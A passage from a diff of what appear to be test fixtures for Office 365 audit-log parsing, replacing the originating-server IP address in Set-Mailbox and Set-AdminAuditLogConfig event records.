- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5400,7 +5400,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -5422,7 +5422,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5434,7 +5434,7 @@
 "Operation": "Set-AdminAuditLogConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -5464,7 +5464,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5476,7 +5476,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -5550,7 +5550,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5562,7 +5562,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -5636,7 +5636,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5648,7 +5648,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -5722,7 +5722,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5734,7 +5734,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -5808,7 +5808,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
